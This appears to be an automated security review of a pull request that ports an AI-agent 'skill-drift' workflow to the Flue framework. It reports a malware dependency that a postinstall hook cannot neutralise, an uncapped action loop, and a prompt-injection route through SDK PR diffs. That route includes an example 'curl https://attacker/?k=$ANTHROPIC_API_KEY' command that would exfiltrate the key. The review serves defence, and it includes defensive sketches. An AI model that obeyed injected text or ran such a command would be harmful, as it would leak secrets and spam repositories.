feat(flue): port skill-drift system to Flue framework (side-by-side) #127
3 issues
security-review: Found 3 issues (1 high, 1 medium, 1 low)
High
postinstall removal of GHSA-3q49-cfcf-g5fm malware package cannot prevent install-time code execution - `package.json:7`
The `postinstall` hook removes `@mistralai/mistralai` after `npm ci` finishes, but npm executes all dependency install scripts before the consumer's `postinstall` runs, so any malicious code in that package has already executed with `GITHUB_TOKEN` available in the environment; the removal provides no protection. Remove `@mistralai/mistralai` from the transitive dependency tree (e.g., by replacing or patching the upstream `@flue/sdk` dep) before running this workflow in CI.
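One way to catch this before any install script runs is to inspect the lockfile and fail the job if the package is still resolvable. The following is a minimal sketch, not the project's actual tooling. It assumes an npm lockfile in the v2/v3 layout (a top-level `packages` object keyed by `node_modules/...` paths); the function name `find_banned_packages` and the sample lockfile contents are hypothetical.

```python
import json


def find_banned_packages(lockfile: dict, banned: set[str]) -> list[str]:
    """Return lockfile paths that resolve to a banned package name.

    Assumes lockfile v2/v3, where `packages` maps install paths such as
    "node_modules/a/node_modules/@scope/b" to package metadata.
    """
    hits = []
    for path in lockfile.get("packages", {}):
        # The package name is whatever follows the last "node_modules/".
        _, sep, name = path.rpartition("node_modules/")
        if sep and name in banned:
            hits.append(path)
    return sorted(hits)


# Hypothetical lockfile fragment, for illustration only.
sample_lock = json.loads("""
{
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "example"},
    "node_modules/@flue/sdk": {"version": "0.0.0"},
    "node_modules/@flue/sdk/node_modules/@mistralai/mistralai": {"version": "0.0.0"}
  }
}
""")

hits = find_banned_packages(sample_lock, {"@mistralai/mistralai"})
print(hits)
```

A check like this would have to run before `npm ci`, since it must finish before any dependency install script can execute; a non-empty result would fail the job.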
Medium
Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job - `.flue/roles/creator.md:108-118`
The reusable detector workflow runs the Flue agent with `sandbox: 'local'` (unrestricted local shell) in a step that has `ANTHROPIC_API_KEY` and `GH_TOKEN` exported in its environment, and the detector role instructs the LLM to ingest attacker-controlled content via `gh pr diff "$PR_NUMBER" --repo "$SDK_REPO"`. A contributor who lands prompt-injection text in any merged SDK PR diff (e.g. a code comment, test fixture, or doc string) can coerce the agent to run a shell command such as `curl https://attacker/?k=$ANTHROPIC_API_KEY`, exfiltrating the secret. Move the LLM invocation into a job that does not have `ANTHROPIC_API_KEY`/`GH_TOKEN` in its environment, or fetch the diff in a separate step and feed it to the agent through a sandboxed channel that strips shell tool access.
Also found at:
`.flue/roles/detector.md:72-80`
`docs/agent-port/sdk-repo-wrappers/README.md:25-27`
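The environment-isolation part of the recommendation can be illustrated with a small sketch: any process that executes model-chosen shell commands is started with the secrets removed from its environment. This is an assumption-laden example, not Flue's API. The helper names `scrubbed_env` and `run_without_secrets` are hypothetical, and how Flue actually spawns its shell tools is not described in the finding.

```python
import os
import subprocess
import sys

# Secret names taken from the finding; extend for other credentials.
SECRET_NAMES = frozenset({"ANTHROPIC_API_KEY", "GH_TOKEN"})


def scrubbed_env(env, secret_names=SECRET_NAMES):
    """Return a copy of env with the named secrets removed."""
    return {k: v for k, v in env.items() if k not in secret_names}


def run_without_secrets(argv, env=None):
    """Run argv in a child process that cannot read the named secrets."""
    base = dict(os.environ if env is None else env)
    return subprocess.run(
        argv,
        env=scrubbed_env(base),
        capture_output=True,
        text=True,
        check=True,
    )


# Demo: the parent environment holds a dummy key; the child reports
# whether the variable is visible to it.
demo_env = dict(os.environ, ANTHROPIC_API_KEY="dummy-value")
child = [sys.executable, "-c",
         "import os; print('ANTHROPIC_API_KEY' in os.environ)"]
result = run_without_secrets(child, env=demo_env)
print(result.stdout.strip())
```

Scrubbing the environment only closes the `$ANTHROPIC_API_KEY` expansion path shown in the finding. It does not restrict network access or credentials stored on disk, so it complements rather than replaces removing shell tool access.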
Low
Detector actuate loop lacks any cap on emitted create_pr/create_issue actions - `.flue/roles/detector.md:16-17`
The detector role prescribes a 5+5 cap on `create_pr`/`create_issue` actions, but the actuate step in `flue-skill-drift-detector-reusable.yml` iterates `jq -c '.actions[]' result.json` with no count enforcement. Prompt-injection content in a merged SDK PR can therefore drive the model to emit many actions, each creating a real PR or issue against `getsentry/sentry-for-ai` via the GitHub App token. Issue creation in particular has no allowlist guard, allowing unbounded spam (PR creation is partially bounded by the `^skills/` patch allowlist).
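Enforcing the cap outside the model could look roughly like the sketch below, which filters the action list before anything is created. The shape of `result.json` is not shown in the finding, so this assumes each action is an object with a `type` field; `enforce_caps` and the sample data are hypothetical.

```python
from collections import Counter

# The 5+5 cap from the detector role, enforced in code rather than by prompt.
CAPS = {"create_pr": 5, "create_issue": 5}


def enforce_caps(actions, caps=CAPS):
    """Split actions into (kept, dropped), keeping at most caps[type] per type.

    Assumption: every action is a dict with a "type" key. Types without an
    entry in caps pass through unchanged.
    """
    seen = Counter()
    kept, dropped = [], []
    for action in actions:
        kind = action.get("type")
        limit = caps.get(kind)
        if limit is not None and seen[kind] >= limit:
            dropped.append(action)
            continue
        seen[kind] += 1
        kept.append(action)
    return kept, dropped


# Hypothetical model output: 8 issue actions and 2 PR actions.
actions = [{"type": "create_issue", "n": i} for i in range(8)]
actions += [{"type": "create_pr", "n": i} for i in range(2)]

kept, dropped = enforce_caps(actions)
print(len(kept), len(dropped))
```

A stricter variant might fail the whole run when anything is dropped, on the theory that an over-cap result is itself a sign of injected instructions.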
⏱ 16m 36s · 2.0M in / 239.0k out · $8.18
Annotations
Check failure on line 7 in package.json
sentry-warden / warden: security-review
postinstall removal of GHSA-3q49-cfcf-g5fm malware package cannot prevent install-time code execution
The `postinstall` hook removes `@mistralai/mistralai` after `npm ci` finishes, but npm executes all dependency install scripts before the consumer's `postinstall` runs, so any malicious code in that package has already executed with `GITHUB_TOKEN` available in the environment; the removal provides no protection. Remove `@mistralai/mistralai` from the transitive dependency tree (e.g., by replacing or patching the upstream `@flue/sdk` dep) before running this workflow in CI.
Check warning on line 118 in .flue/roles/creator.md
sentry-warden / warden: security-review
Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job
The reusable detector workflow runs the Flue agent with `sandbox: 'local'` (unrestricted local shell) in a step that has `ANTHROPIC_API_KEY` and `GH_TOKEN` exported in its environment, and the detector role instructs the LLM to ingest attacker-controlled content via `gh pr diff "$PR_NUMBER" --repo "$SDK_REPO"`. A contributor who lands prompt-injection text in any merged SDK PR diff (e.g. a code comment, test fixture, or doc string) can coerce the agent to run a shell command such as `curl https://attacker/?k=$ANTHROPIC_API_KEY`, exfiltrating the secret. Move the LLM invocation into a job that does not have `ANTHROPIC_API_KEY`/`GH_TOKEN` in its environment, or fetch the diff in a separate step and feed it to the agent through a sandboxed channel that strips shell tool access.
Check warning on line 80 in .flue/roles/detector.md
sentry-warden / warden: security-review
[BSW-B49] Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job (additional location)
Check warning on line 27 in docs/agent-port/sdk-repo-wrappers/README.md
sentry-warden / warden: security-review
[BSW-B49] Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job (additional location)